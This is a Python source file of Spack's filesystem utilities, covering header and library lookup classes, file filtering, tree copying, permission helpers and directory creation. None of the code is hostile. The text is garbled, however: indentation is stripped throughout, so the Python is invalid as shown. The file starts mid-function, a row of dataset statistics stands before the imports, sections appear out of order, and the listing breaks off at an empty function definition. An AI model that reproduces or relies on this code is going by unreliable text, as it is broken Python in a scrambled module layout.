    # The variable here is **on purpose** a defaultdict as os.listdir
# can return files in any order (does not preserve stability)
found_files = collections.defaultdict(list)
# Make the path absolute to have absolute path returned
root = os.path.abspath(root)
for search_file in search_files:
matches = glob.glob(os.path.join(root, search_file))
matches = [os.path.join(root, x) for x in matches]
found_files[search_file].extend(matches)
answer = []
for search_file in search_files:
answer.extend(found_files[search_file])
return answer
# Utilities for libraries and headers
class FileList(collections.Sequence):
"""Sequence of absolute paths to files.
Provides a few convenience methods to manipulate file paths.
"""
def __init__(self, files):
if isinstance(files, six.string_types):
files = [files]
self.files = list(dedupe(files))
@property
def directories(self):
"""Stable de-duplication of the directories where the files reside.
>>> l = LibraryList(['/dir1/liba.a', '/dir2/libb.a', '/dir1/libc.a'])
>>> l.directories
['/dir1', '/dir2']
>>> h = HeaderList(['/dir1/a.h', '/dir1/b.h', '/dir2/c.h'])
>>> h.directories
['/dir1', '/dir2']
Returns:
list of strings: A list of directories
"""
return list(dedupe(
os.path.dirname(x) for x in self.files if os.path.dirname(x)
))
@property
def basenames(self):
"""Stable de-duplication of the base-names in the list
>>> l = LibraryList(['/dir1/liba.a', '/dir2/libb.a', '/dir3/liba.a'])
>>> l.basenames
['liba.a', 'libb.a']
>>> h = HeaderList(['/dir1/a.h', '/dir2/b.h', '/dir3/a.h'])
>>> h.basenames
['a.h', 'b.h']
Returns:
list of strings: A list of base-names
"""
return list(dedupe(os.path.basename(x) for x in self.files))
def __getitem__(self, item):
cls = type(self)
if isinstance(item, numbers.Integral):
return self.files[item]
return cls(self.files[item])
def __add__(self, other):
return self.__class__(dedupe(self.files + list(other)))
def __radd__(self, other):
return self.__add__(other)
def __eq__(self, other):
return self.files == other.files
def __len__(self):
return len(self.files)
def joined(self, separator=' '):
return separator.join(self.files)
def __repr__(self):
return self.__class__.__name__ + '(' + repr(self.files) + ')'
def __str__(self):
return self.joined()
class HeaderList(FileList):
"""Sequence of absolute paths to headers.
Provides a few convenience methods to manipulate header paths and get
commonly used compiler flags or names.
"""
# Make sure to only match complete words, otherwise path components such
# as "xinclude" will cause false matches.
# Avoid matching paths such as <prefix>/include/something/detail/include,
# e.g. in the CUDA Toolkit which ships internal libc++ headers.
include_regex = re.compile(r'(.*?)(\binclude\b)(.*)')
def __init__(self, files):
super(HeaderList, self).__init__(files)
self._macro_definitions = []
self._directories = None
@property
def directories(self):
"""Directories to be searched for header files."""
values = self._directories
if values is None:
values = self._default_directories()
return list(dedupe(values))
@directories.setter
def directories(self, value):
value = value or []
# Accept a single directory as input
if isinstance(value, six.string_types):
value = [value]
self._directories = [os.path.normpath(x) for x in value]
def _default_directories(self):
"""Default computation of directories based on the list of
header files.
"""
dir_list = super(HeaderList, self).directories
values = []
for d in dir_list:
# If the path contains a subdirectory named 'include' then stop
# there and don't add anything else to the path.
m = self.include_regex.match(d)
value = os.path.join(*m.group(1, 2)) if m else d
values.append(value)
return values
@property
def headers(self):
"""Stable de-duplication of the headers.
Returns:
list of strings: A list of header files
"""
return self.files
@property
def names(self):
"""Stable de-duplication of header names in the list without extensions
>>> h = HeaderList(['/dir1/a.h', '/dir2/b.h', '/dir3/a.h'])
>>> h.names
['a', 'b']
Returns:
list of strings: A list of files without extensions
"""
names = []
for x in self.basenames:
name = x
# Valid extensions include: ['.cuh', '.hpp', '.hh', '.h']
for ext in ['.cuh', '.hpp', '.hh', '.h']:
i = name.rfind(ext)
if i != -1:
names.append(name[:i])
break
else:
# No valid extension, should we still include it?
names.append(name)
return list(dedupe(names))
@property
def include_flags(self):
"""Include flags
>>> h = HeaderList(['/dir1/a.h', '/dir1/b.h', '/dir2/c.h'])
>>> h.include_flags
'-I/dir1 -I/dir2'
Returns:
str: A joined list of include flags
"""
return ' '.join(['-I' + x for x in self.directories])
@property
def macro_definitions(self):
"""Macro definitions
>>> h = HeaderList(['/dir1/a.h', '/dir1/b.h', '/dir2/c.h'])
>>> h.add_macro('-DBOOST_LIB_NAME=boost_regex')
>>> h.add_macro('-DBOOST_DYN_LINK')
>>> h.macro_definitions
'-DBOOST_LIB_NAME=boost_regex -DBOOST_DYN_LINK'
Returns:
str: A joined list of macro definitions
"""
return ' '.join(self._macro_definitions)
@property
def cpp_flags(self):
"""Include flags + macro definitions
>>> h = HeaderList(['/dir1/a.h', '/dir1/b.h', '/dir2/c.h'])
>>> h.cpp_flags
'-I/dir1 -I/dir2'
>>> h.add_macro('-DBOOST_DYN_LINK')
>>> h.cpp_flags
'-I/dir1 -I/dir2 -DBOOST_DYN_LINK'
Returns:
str: A joined list of include flags and macro definitions
"""
cpp_flags = self.include_flags
if self.macro_definitions:
cpp_flags += ' ' + self.macro_definitions
return cpp_flags
def add_macro(self, macro):
"""Add a macro definition
Parameters:
macro (str): The macro to add
"""
self._macro_definitions.append(macro)
def find_headers(headers, root, recursive=False):
"""Returns an iterable object containing a list of full paths to
headers if found.
Accepts any glob characters accepted by fnmatch:
======= ====================================
Pattern Meaning
======= ====================================
* matches everything
? matches any single character
[seq] matches any character in ``seq``
[!seq] matches any character not in ``seq``
======= ====================================
Parameters:
headers (str or list of str): Header name(s) to search for
root (str): The root directory to start searching from
recursive (bool, optional): if False search only root folder,
if True descends top-down from the root. Defaults to False.
Returns:
HeaderList: The headers that have been found
"""
if isinstance(headers, six.string_types):
headers = [headers]
elif not isinstance(headers, collections.Sequence):
message = '{0} expects a string or sequence of strings as the '
message += 'first argument [got {1} instead]'
message = message.format(find_headers.__name__, type(headers))
raise TypeError(message)
# Construct the right suffix for the headers
suffixes = [
# C
'h',
# C++
'hpp', 'hxx', 'hh', 'H', 'txx', 'tcc', 'icc',
# Fortran
'mod', 'inc',
]
# List of headers we are searching with suffixes
headers = ['{0}.{1}'.format(header, suffix) for header in headers
for suffix in suffixes]
return HeaderList(find(root, headers, recursive))
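# Sketch: locate zlib's header under a hypothetical prefix and derive
# compiler flags from the resulting HeaderList.
def _demo_find_headers(prefix):
    hl = find_headers('zlib', root=os.path.join(prefix, 'include'))
    return hl.include_flags  # e.g. '-I<prefix>/include'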
def find_all_headers(root):
"""Convenience function that returns the list of all headers found
in the directory passed as argument.
Args:
root (path): directory where to look recursively for header files
Returns:
List of all headers found in ``root`` and subdirectories.
"""
return find_headers('*', root=root, recursive=True)
class LibraryList(FileList):
"""Sequence of absolute paths to libraries
Provides a few convenience methods to manipulate library paths and get
commonly used compiler flags or names
"""
@property
def libraries(self):
"""Stable de-duplication of library files.
Returns:
list of strings: A list of library files
"""
return self.files
@property
def names(self):
"""Stable de-duplication of library names in the list
>>> l = LibraryList(['/dir1/liba.a', '/dir2/libb.a', '/dir3/liba.so'])
>>> l.names
['a', 'b']
Returns:
list of strings: A list of library names
"""
names = []
for x in self.basenames:
name = x
if x.startswith('lib'):
name = x[3:]
# Valid extensions include: ['.dylib', '.so', '.a']
for ext in ['.dylib', '.so', '.a']:
i = name.rfind(ext)
if i != -1:
names.append(name[:i])
break
else:
# No valid extension, should we still include it?
names.append(name)
return list(dedupe(names))
@property
def search_flags(self):
"""Search flags for the libraries
>>> l = LibraryList(['/dir1/liba.a', '/dir2/libb.a', '/dir1/liba.so'])
>>> l.search_flags
'-L/dir1 -L/dir2'
Returns:
str: A joined list of search flags
"""
return ' '.join(['-L' + x for x in self.directories])
@property
def link_flags(self):
"""Link flags for the libraries
>>> l = LibraryList(['/dir1/liba.a', '/dir2/libb.a', '/dir1/liba.so'])
>>> l.link_flags
'-la -lb'
Returns:
str: A joined list of link flags
"""
return ' '.join(['-l' + name for name in self.names])
@property
def ld_flags(self):
"""Search flags + link flags
>>> l = LibraryList(['/dir1/liba.a', '/dir2/libb.a', '/dir1/liba.so'])
>>> l.ld_flags
'-L/dir1 -L/dir2 -la -lb'
Returns:
str: A joined list of search flags and link flags
"""
return self.search_flags + ' ' + self.link_flags
def find_system_libraries(libraries, shared=True):
"""Searches the usual system library locations for ``libraries``.
Search order is as follows:
1. ``/lib64``
2. ``/lib``
3. ``/usr/lib64``
4. ``/usr/lib``
5. ``/usr/local/lib64``
6. ``/usr/local/lib``
Accepts any glob characters accepted by fnmatch:
======= ====================================
Pattern Meaning
======= ====================================
* matches everything
? matches any single character
[seq] matches any character in ``seq``
[!seq] matches any character not in ``seq``
======= ====================================
Parameters:
libraries (str or list of str): Library name(s) to search for
shared (bool, optional): if True searches for shared libraries,
otherwise for static. Defaults to True.
Returns:
LibraryList: The libraries that have been found
"""
if isinstance(libraries, six.string_types):
libraries = [libraries]
elif not isinstance(libraries, collections.Sequence):
message = '{0} expects a string or sequence of strings as the '
message += 'first argument [got {1} instead]'
message = message.format(find_system_libraries.__name__,
type(libraries))
raise TypeError(message)
libraries_found = []
search_locations = [
'/lib64',
'/lib',
'/usr/lib64',
'/usr/lib',
'/usr/local/lib64',
'/usr/local/lib',
]
for library in libraries:
for root in search_locations:
result = find_libraries(library, root, shared, recursive=True)
if result:
libraries_found += result
break
return libraries_found
def find_libraries(libraries, root, shared=True, recursive=False):
"""Returns an iterable of full paths to libraries found in a root dir.
Accepts any glob characters accepted by fnmatch:
======= ====================================
Pattern Meaning
======= ====================================
* matches everything
? matches any single character
[seq] matches any character in ``seq``
[!seq] matches any character not in ``seq``
======= ====================================
Parameters:
libraries (str or list of str): Library name(s) to search for
root (str): The root directory to start searching from
shared (bool, optional): if True searches for shared libraries,
otherwise for static. Defaults to True.
recursive (bool, optional): if False search only root folder,
if True descends top-down from the root. Defaults to False.
Returns:
LibraryList: The libraries that have been found
"""
if isinstance(libraries, six.string_types):
libraries = [libraries]
elif not isinstance(libraries, collections.Sequence):
message = '{0} expects a string or sequence of strings as the '
message += 'first argument [got {1} instead]'
message = message.format(find_libraries.__name__, type(libraries))
raise TypeError(message)
# Construct the right suffix for the library
if shared is True:
suffix = 'dylib' if sys.platform == 'darwin' else 'so'
else:
suffix = 'a'
# List of libraries we are searching with suffixes
libraries = ['{0}.{1}'.format(lib, suffix) for lib in libraries]
if not recursive:
# If not recursive, look for the libraries directly in root
return LibraryList(find(root, libraries, False))
# To speedup the search for external packages configured e.g. in /usr,
# perform first non-recursive search in root/lib then in root/lib64 and
# finally search all of root recursively. The search stops when the first
# match is found.
for subdir in ('lib', 'lib64'):
dirname = join_path(root, subdir)
if not os.path.isdir(dirname):
continue
found_libs = find(dirname, libraries, False)
if found_libs:
break
else:
found_libs = find(root, libraries, True)
return LibraryList(found_libs)
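# Sketch (hypothetical prefix): the recursive lookup first scans root/lib
# and root/lib64 non-recursively, then falls back to the whole tree.
def _demo_find_libraries(prefix):
    ll = find_libraries('libz', root=prefix, shared=True, recursive=True)
    return ll.ld_flags  # e.g. '-L<prefix>/lib -lz'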
@memoized
def can_access_dir(path):
"""Returns True if the argument is an accessible directory.
Args:
path: path to be tested
Returns:
True if ``path`` is an accessible directory, else False
"""
return os.path.isdir(path) and os.access(path, os.R_OK | os.X_OK)
@memoized
def can_write_to_dir(path):
"""Return True if the argument is a directory in which we can write.
Args:
path: path to be tested
Returns:
        True if ``path`` is a writable directory, else False
"""
return os.path.isdir(path) and os.access(path, os.R_OK | os.X_OK | os.W_OK)
@memoized
def files_in(*search_paths):
"""Returns all the files in paths passed as arguments.
Caller must ensure that each path in ``search_paths`` is a directory.
Args:
*search_paths: directories to be searched
Returns:
List of (file, full_path) tuples with all the files found.
"""
files = []
for d in filter(can_access_dir, search_paths):
files.extend(filter(
lambda x: os.path.isfile(x[1]),
[(f, os.path.join(d, f)) for f in os.listdir(d)]
))
return files
def search_paths_for_executables(*path_hints):
"""Given a list of path hints returns a list of paths where
to search for an executable.
Args:
*path_hints (list of paths): list of paths taken into
consideration for a search
Returns:
A list containing the real path of every existing directory
in `path_hints` and its `bin` subdirectory if it exists.
"""
executable_paths = []
for path in path_hints:
if not os.path.isdir(path):
continue
path = os.path.abspath(path)
executable_paths.append(path)
bin_dir = os.path.join(path, 'bin')
if os.path.isdir(bin_dir):
executable_paths.append(bin_dir)
return executable_paths
def partition_path(path, entry=None):
"""
Split the prefixes of the path at the first occurrence of entry and
return a 3-tuple containing a list of the prefixes before the entry, a
string of the prefix ending with the entry, and a list of the prefixes
after the entry.
If the entry is not a node in the path, the result will be the prefix list
followed by an empty string and an empty list.
"""
paths = prefixes(path)
if entry is not None:
        # Derive the index of entry within paths, which will correspond to
        # the location of the entry within the path.
try:
entries = path.split(os.sep)
i = entries.index(entry)
if '' in entries:
i -= 1
return paths[:i], paths[i], paths[i + 1:]
except ValueError:
pass
return paths, '', []
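# Worked example (assumes a POSIX os.sep of '/'): partitioning '/a/b/c/d'
# at entry 'c' yields (['/a', '/a/b'], '/a/b/c', ['/a/b/c/d']).
def _demo_partition_path():
    before, at, after = partition_path('/a/b/c/d', 'c')
    assert (before, at, after) == (['/a', '/a/b'], '/a/b/c', ['/a/b/c/d'])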
def prefixes(path):
"""
Returns a list containing the path and its ancestors, top-to-bottom.
The list for an absolute path will not include an ``os.sep`` entry.
For example, assuming ``os.sep`` is ``/``, given path ``/ab/cd/efg``
the resulting paths will be, in order: ``/ab``, ``/ab/cd``, and
``/ab/cd/efg``
The list for a relative path starting ``./`` will not include ``.``.
For example, path ``./hi/jkl/mn`` results in a list with the following
paths, in order: ``./hi``, ``./hi/jkl``, and ``./hi/jkl/mn``.
Parameters:
path (str): the string used to derive ancestor paths
Returns:
A list containing ancestor paths in order and ending with the path
"""
if not path:
return []
parts = path.strip(os.sep).split(os.sep)
if path.startswith(os.sep):
parts.insert(0, os.sep)
paths = [os.path.join(*parts[:i + 1]) for i in range(len(parts))]
try:
paths.remove(os.sep)
except ValueError:
pass
try:
paths.remove('.')
except ValueError:
pass
return paths
def md5sum(file):
"""Compute the MD5 sum of a file.
Args:
file (str): file to be checksummed
Returns:
MD5 sum of the file's content
"""
md5 = hashlib.md5()
with open(file, "rb") as f:
md5.update(f.read())
return md5.digest()
def remove_directory_contents(dir):
"""Remove all contents of a directory."""
if os.path.exists(dir):
for entry in [os.path.join(dir, entry) for entry in os.listdir(dir)]:
if os.path.isfile(entry) or os.path.islink(entry):
os.unlink(entry)
else:
shutil.rmtree(entry)
| 31.836616
| 79
| 0.60091
|
import collections
import errno
import hashlib
import glob
import grp
import itertools
import numbers
import os
import pwd
import re
import shutil
import stat
import sys
import tempfile
from contextlib import contextmanager
import six
from llnl.util import tty
from llnl.util.lang import dedupe, memoized
from spack.util.executable import Executable
__all__ = [
'FileFilter',
'FileList',
'HeaderList',
'LibraryList',
'ancestor',
'can_access',
'change_sed_delimiter',
'copy_mode',
'filter_file',
'find',
'find_headers',
'find_all_headers',
'find_libraries',
'find_system_libraries',
'fix_darwin_install_name',
'force_remove',
'force_symlink',
'chgrp',
'chmod_x',
'copy',
'install',
'copy_tree',
'install_tree',
'is_exe',
'join_path',
'mkdirp',
'partition_path',
'prefixes',
'remove_dead_links',
'remove_directory_contents',
'remove_if_dead_link',
'remove_linked_tree',
'set_executable',
'set_install_permissions',
'touch',
'touchp',
'traverse_tree',
'unset_executable_mode',
'working_dir'
]
def path_contains_subdirectory(path, root):
norm_root = os.path.abspath(root).rstrip(os.path.sep) + os.path.sep
norm_path = os.path.abspath(path).rstrip(os.path.sep) + os.path.sep
return norm_path.startswith(norm_root)
def possible_library_filenames(library_names):
lib_extensions = ['a', 'la', 'so', 'tbd', 'dylib']
return set(
'.'.join((lib, extension)) for lib, extension in
itertools.product(library_names, lib_extensions))
def paths_containing_libs(paths, library_names):
required_lib_fnames = possible_library_filenames(library_names)
rpaths_to_include = []
for path in paths:
fnames = set(os.listdir(path))
if fnames & required_lib_fnames:
rpaths_to_include.append(path)
return rpaths_to_include
def same_path(path1, path2):
norm1 = os.path.abspath(path1).rstrip(os.path.sep)
norm2 = os.path.abspath(path2).rstrip(os.path.sep)
return norm1 == norm2
def filter_file(regex, repl, *filenames, **kwargs):
string = kwargs.get('string', False)
backup = kwargs.get('backup', True)
ignore_absent = kwargs.get('ignore_absent', False)
stop_at = kwargs.get('stop_at', None)
if not callable(repl):
unescaped = repl.replace(r'\\', '\\')
def replace_groups_with_groupid(m):
def groupid_to_group(x):
return m.group(int(x.group(1)))
return re.sub(r'\\([1-9])', groupid_to_group, unescaped)
repl = replace_groups_with_groupid
if string:
regex = re.escape(regex)
for filename in filenames:
msg = 'FILTER FILE: {0} [replacing "{1}"]'
tty.debug(msg.format(filename, regex))
backup_filename = filename + "~"
tmp_filename = filename + ".spack~"
if ignore_absent and not os.path.exists(filename):
msg = 'FILTER FILE: file "{0}" not found. Skipping to next file.'
tty.debug(msg.format(filename))
continue
        # Create a backup file. Don't overwrite an existing backup
        # file in case this file is being filtered multiple times.
if not os.path.exists(backup_filename):
shutil.copy(filename, backup_filename)
# Create a temporary file to read from. We cannot use backup_filename
# in case filter_file is invoked multiple times on the same file.
shutil.copy(filename, tmp_filename)
try:
extra_kwargs = {}
if sys.version_info > (3, 0):
extra_kwargs = {'errors': 'surrogateescape'}
# Open as a text file and filter until the end of the file is
# reached or we found a marker in the line if it was specified
with open(tmp_filename, mode='r', **extra_kwargs) as input_file:
with open(filename, mode='w', **extra_kwargs) as output_file:
# Using iter and readline is a workaround needed not to
# disable input_file.tell(), which will happen if we call
# input_file.next() implicitly via the for loop
for line in iter(input_file.readline, ''):
if stop_at is not None:
current_position = input_file.tell()
if stop_at == line.strip():
output_file.write(line)
break
filtered_line = re.sub(regex, repl, line)
output_file.write(filtered_line)
else:
current_position = None
# If we stopped filtering at some point, reopen the file in
# binary mode and copy verbatim the remaining part
if current_position and stop_at:
with open(tmp_filename, mode='rb') as input_file:
input_file.seek(current_position)
with open(filename, mode='ab') as output_file:
output_file.writelines(input_file.readlines())
except BaseException:
# clean up the original file on failure.
shutil.move(backup_filename, filename)
raise
finally:
os.remove(tmp_filename)
if not backup and os.path.exists(backup_filename):
os.remove(backup_filename)
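# Minimal filter_file sketch (the script path is hypothetical): rewrite a
# shebang in place; a 'script~' backup is created automatically.
def _demo_filter_file(script):
    filter_file(r'^#!/usr/bin/python$', '#!/usr/bin/env python', script)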
class FileFilter(object):
def __init__(self, *filenames):
self.filenames = filenames
def filter(self, regex, repl, **kwargs):
return filter_file(regex, repl, *self.filenames, **kwargs)
def change_sed_delimiter(old_delim, new_delim, *filenames):
assert(len(old_delim) == 1)
assert(len(new_delim) == 1)
# TODO: handle these cases one day?
assert(old_delim != '"')
assert(old_delim != "'")
assert(new_delim != '"')
assert(new_delim != "'")
whole_lines = "^s@([^@]*)@(.*)@[gIp]$"
whole_lines = whole_lines.replace('@', old_delim)
single_quoted = r"'s@((?:\\'|[^@'])*)@((?:\\'|[^'])*)@[gIp]?'"
single_quoted = single_quoted.replace('@', old_delim)
double_quoted = r'"s@((?:\\"|[^@"])*)@((?:\\"|[^"])*)@[gIp]?"'
double_quoted = double_quoted.replace('@', old_delim)
repl = r's@\1@\2@g'
repl = repl.replace('@', new_delim)
for f in filenames:
filter_file(whole_lines, repl, f)
filter_file(single_quoted, "'%s'" % repl, f)
filter_file(double_quoted, '"%s"' % repl, f)
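# Sketch (hypothetical Makefile path): switch sed commands from '/' to '@'
# delimiters so that substituted paths may themselves contain '/'.
def _demo_change_sed_delimiter(makefile):
    change_sed_delimiter('/', '@', makefile)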
def set_install_permissions(path):
# If this points to a file maintained in a Spack prefix, it is assumed that
# this function will be invoked on the target. If the file is outside a
# Spack-maintained prefix, the permissions should not be modified.
if os.path.islink(path):
return
if os.path.isdir(path):
os.chmod(path, 0o755)
else:
os.chmod(path, 0o644)
def group_ids(uid=None):
if uid is None:
uid = os.getuid()
user = pwd.getpwuid(uid).pw_name
return [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
def chgrp(path, group):
if isinstance(group, six.string_types):
gid = grp.getgrnam(group).gr_gid
else:
gid = group
os.chown(path, -1, gid)
def chmod_x(entry, perms):
mode = os.stat(entry).st_mode
if os.path.isfile(entry):
if not mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
perms &= ~stat.S_IXUSR
perms &= ~stat.S_IXGRP
perms &= ~stat.S_IXOTH
os.chmod(entry, perms)
def copy_mode(src, dest):
if os.path.islink(dest):
return
src_mode = os.stat(src).st_mode
dest_mode = os.stat(dest).st_mode
if src_mode & stat.S_IXUSR:
dest_mode |= stat.S_IXUSR
if src_mode & stat.S_IXGRP:
dest_mode |= stat.S_IXGRP
if src_mode & stat.S_IXOTH:
dest_mode |= stat.S_IXOTH
os.chmod(dest, dest_mode)
def unset_executable_mode(path):
mode = os.stat(path).st_mode
mode &= ~stat.S_IXUSR
mode &= ~stat.S_IXGRP
mode &= ~stat.S_IXOTH
os.chmod(path, mode)
def copy(src, dest, _permissions=False):
if _permissions:
tty.debug('Installing {0} to {1}'.format(src, dest))
else:
tty.debug('Copying {0} to {1}'.format(src, dest))
# Expand dest to its eventual full path if it is a directory.
if os.path.isdir(dest):
dest = join_path(dest, os.path.basename(src))
shutil.copy(src, dest)
if _permissions:
set_install_permissions(dest)
copy_mode(src, dest)
def install(src, dest):
copy(src, dest, _permissions=True)
def resolve_link_target_relative_to_the_link(link):
target = os.readlink(link)
if os.path.isabs(target):
return target
link_dir = os.path.dirname(os.path.abspath(link))
return os.path.join(link_dir, target)
def copy_tree(src, dest, symlinks=True, ignore=None, _permissions=False):
if _permissions:
tty.debug('Installing {0} to {1}'.format(src, dest))
else:
tty.debug('Copying {0} to {1}'.format(src, dest))
abs_src = os.path.abspath(src)
if not abs_src.endswith(os.path.sep):
abs_src += os.path.sep
abs_dest = os.path.abspath(dest)
if not abs_dest.endswith(os.path.sep):
abs_dest += os.path.sep
# Stop early to avoid unnecessary recursion if being asked to copy from a
# parent directory.
if abs_dest.startswith(abs_src):
raise ValueError('Cannot copy ancestor directory {0} into {1}'.
format(abs_src, abs_dest))
mkdirp(dest)
for s, d in traverse_tree(abs_src, abs_dest, order='pre',
follow_symlinks=not symlinks,
ignore=ignore,
follow_nonexisting=True):
if os.path.islink(s):
link_target = resolve_link_target_relative_to_the_link(s)
if symlinks:
target = os.readlink(s)
if os.path.isabs(target):
new_target = re.sub(abs_src, abs_dest, target)
if new_target != target:
tty.debug("Redirecting link {0} to {1}"
.format(target, new_target))
target = new_target
os.symlink(target, d)
elif os.path.isdir(link_target):
mkdirp(d)
else:
shutil.copyfile(s, d)
else:
if os.path.isdir(s):
mkdirp(d)
else:
shutil.copy2(s, d)
if _permissions:
set_install_permissions(d)
copy_mode(s, d)
def install_tree(src, dest, symlinks=True, ignore=None):
copy_tree(src, dest, symlinks=symlinks, ignore=ignore, _permissions=True)
def is_exe(path):
return os.path.isfile(path) and os.access(path, os.X_OK)
def get_filetype(path_name):
file = Executable('file')
file.add_default_env('LC_ALL', 'C')
output = file('-b', '-h', '%s' % path_name,
output=str, error=str)
return output.strip()
def chgrp_if_not_world_writable(path, group):
mode = os.stat(path).st_mode
if not mode & stat.S_IWOTH:
chgrp(path, group)
def mkdirp(*paths, **kwargs):
mode = kwargs.get('mode', None)
group = kwargs.get('group', None)
default_perms = kwargs.get('default_perms', 'args')
for path in paths:
if not os.path.exists(path):
try:
# detect missing intermediate folders
intermediate_folders = []
last_parent = ''
intermediate_path = os.path.dirname(path)
while intermediate_path:
if os.path.exists(intermediate_path):
last_parent = intermediate_path
break
intermediate_folders.append(intermediate_path)
intermediate_path = os.path.dirname(intermediate_path)
# create folders
os.makedirs(path)
# leaf folder permissions
if mode is not None:
os.chmod(path, mode)
if group:
chgrp_if_not_world_writable(path, group)
if mode is not None:
os.chmod(path, mode) # reset sticky grp bit post chgrp
# for intermediate folders, change mode just for newly created
# ones and if mode_intermediate has been specified, otherwise
# intermediate folders list is not populated at all and default
# OS mode will be used
if default_perms == 'args':
intermediate_mode = mode
intermediate_group = group
elif default_perms == 'parents':
stat_info = os.stat(last_parent)
intermediate_mode = stat_info.st_mode
intermediate_group = stat_info.st_gid
else:
msg = "Invalid value: '%s'. " % default_perms
msg += "Choose from 'args' or 'parents'."
raise ValueError(msg)
for intermediate_path in reversed(intermediate_folders):
if intermediate_mode is not None:
os.chmod(intermediate_path, intermediate_mode)
if intermediate_group is not None:
chgrp_if_not_world_writable(intermediate_path,
intermediate_group)
os.chmod(intermediate_path,
intermediate_mode) # reset sticky bit after
except OSError as e:
if e.errno != errno.EEXIST or not os.path.isdir(path):
raise e
elif not os.path.isdir(path):
raise OSError(errno.EEXIST, "File already exists", path)
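# Sketch (hypothetical root): create nested directories, propagating the
# existing parent's mode and group to every newly created folder.
def _demo_mkdirp(root):
    mkdirp(os.path.join(root, 'a', 'b', 'c'), default_perms='parents')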
def force_remove(*paths):
for path in paths:
try:
os.remove(path)
except OSError:
pass
@contextmanager
def working_dir(dirname, **kwargs):
if kwargs.get('create', False):
mkdirp(dirname)
orig_dir = os.getcwd()
os.chdir(dirname)
try:
yield
finally:
os.chdir(orig_dir)
@contextmanager
def replace_directory_transaction(directory_name, tmp_root=None):
# Check the input is indeed a directory with absolute path.
# Raise before anything is done to avoid moving the wrong directory
assert os.path.isdir(directory_name), \
'Invalid directory: ' + directory_name
assert os.path.isabs(directory_name), \
'"directory_name" must contain an absolute path: ' + directory_name
directory_basename = os.path.basename(directory_name)
if tmp_root is not None:
assert os.path.isabs(tmp_root)
tmp_dir = tempfile.mkdtemp(dir=tmp_root)
tty.debug('TEMPORARY DIRECTORY CREATED [{0}]'.format(tmp_dir))
shutil.move(src=directory_name, dst=tmp_dir)
tty.debug('DIRECTORY MOVED [src={0}, dest={1}]'.format(
directory_name, tmp_dir
))
try:
yield tmp_dir
except (Exception, KeyboardInterrupt, SystemExit):
# Delete what was there, before copying back the original content
if os.path.exists(directory_name):
shutil.rmtree(directory_name)
shutil.move(
src=os.path.join(tmp_dir, directory_basename),
dst=os.path.dirname(directory_name)
)
tty.debug('DIRECTORY RECOVERED [{0}]'.format(directory_name))
msg = 'the transactional move of "{0}" failed.'
raise RuntimeError(msg.format(directory_name))
else:
# Otherwise delete the temporary directory
shutil.rmtree(tmp_dir)
tty.debug('TEMPORARY DIRECTORY DELETED [{0}]'.format(tmp_dir))
def hash_directory(directory, ignore=[]):
assert os.path.isdir(directory), '"directory" must be a directory!'
md5_hash = hashlib.md5()
# Adapted from https://stackoverflow.com/a/3431835/771663
for root, dirs, files in os.walk(directory):
for name in sorted(files):
filename = os.path.join(root, name)
if filename not in ignore:
            # TODO: if caching big files becomes an issue, convert this to
            # TODO: read in chunks. Currently it's used only for testing
            # TODO: purposes.
with open(filename, 'rb') as f:
md5_hash.update(f.read())
return md5_hash.hexdigest()
@contextmanager
def write_tmp_and_move(filename):
dirname = os.path.dirname(filename)
basename = os.path.basename(filename)
tmp = os.path.join(dirname, '.%s.tmp' % basename)
with open(tmp, 'w') as f:
yield f
shutil.move(tmp, filename)
@contextmanager
def open_if_filename(str_or_file, mode='r'):
if isinstance(str_or_file, six.string_types):
with open(str_or_file, mode) as f:
yield f
else:
yield str_or_file
def touch(path):
perms = (os.O_WRONLY | os.O_CREAT | os.O_NONBLOCK | os.O_NOCTTY)
fd = None
try:
fd = os.open(path, perms)
os.utime(path, None)
finally:
if fd is not None:
os.close(fd)
def touchp(path):
mkdirp(os.path.dirname(path))
touch(path)
def force_symlink(src, dest):
try:
os.symlink(src, dest)
except OSError:
os.remove(dest)
os.symlink(src, dest)
def join_path(prefix, *args):
path = str(prefix)
for elt in args:
path = os.path.join(path, str(elt))
return path
def ancestor(dir, n=1):
parent = os.path.abspath(dir)
for i in range(n):
parent = os.path.dirname(parent)
return parent
def get_single_file(directory):
fnames = os.listdir(directory)
if len(fnames) != 1:
raise ValueError("Expected exactly 1 file, got {0}"
.format(str(len(fnames))))
return fnames[0]
@contextmanager
def temp_cwd():
tmp_dir = tempfile.mkdtemp()
try:
with working_dir(tmp_dir):
yield tmp_dir
finally:
shutil.rmtree(tmp_dir)
@contextmanager
def temp_rename(orig_path, temp_path):
same_path = os.path.realpath(orig_path) == os.path.realpath(temp_path)
if not same_path:
shutil.move(orig_path, temp_path)
try:
yield
finally:
if not same_path:
shutil.move(temp_path, orig_path)
def can_access(file_name):
return os.access(file_name, os.R_OK | os.W_OK)
def traverse_tree(source_root, dest_root, rel_path='', **kwargs):
follow_nonexisting = kwargs.get('follow_nonexisting', True)
    follow_links = kwargs.get(
        'follow_symlinks', kwargs.get('follow_link', False))
order = kwargs.get('order', 'pre')
if order not in ('pre', 'post'):
raise ValueError("Order must be 'pre' or 'post'.")
ignore = kwargs.get('ignore', None) or (lambda filename: False)
if ignore(rel_path):
return
source_path = os.path.join(source_root, rel_path)
dest_path = os.path.join(dest_root, rel_path)
# preorder yields directories before children
if order == 'pre':
yield (source_path, dest_path)
for f in os.listdir(source_path):
source_child = os.path.join(source_path, f)
dest_child = os.path.join(dest_path, f)
rel_child = os.path.join(rel_path, f)
# Treat as a directory
# TODO: for symlinks, os.path.isdir looks for the link target. If the
# target is relative to the link, then that may not resolve properly
# relative to our cwd - see resolve_link_target_relative_to_the_link
if os.path.isdir(source_child) and (
follow_links or not os.path.islink(source_child)):
# When follow_nonexisting isn't set, don't descend into dirs
# in source that do not exist in dest
if follow_nonexisting or os.path.exists(dest_child):
tuples = traverse_tree(
source_root, dest_root, rel_child, **kwargs)
for t in tuples:
yield t
# Treat as a file.
elif not ignore(os.path.join(rel_path, f)):
yield (source_child, dest_child)
if order == 'post':
yield (source_path, dest_path)
def set_executable(path):
mode = os.stat(path).st_mode
if mode & stat.S_IRUSR:
mode |= stat.S_IXUSR
if mode & stat.S_IRGRP:
mode |= stat.S_IXGRP
if mode & stat.S_IROTH:
mode |= stat.S_IXOTH
os.chmod(path, mode)
def remove_empty_directories(root):
for dirpath, subdirs, files in os.walk(root, topdown=False):
for sd in subdirs:
sdp = os.path.join(dirpath, sd)
try:
os.rmdir(sdp)
except OSError:
pass
def remove_dead_links(root):
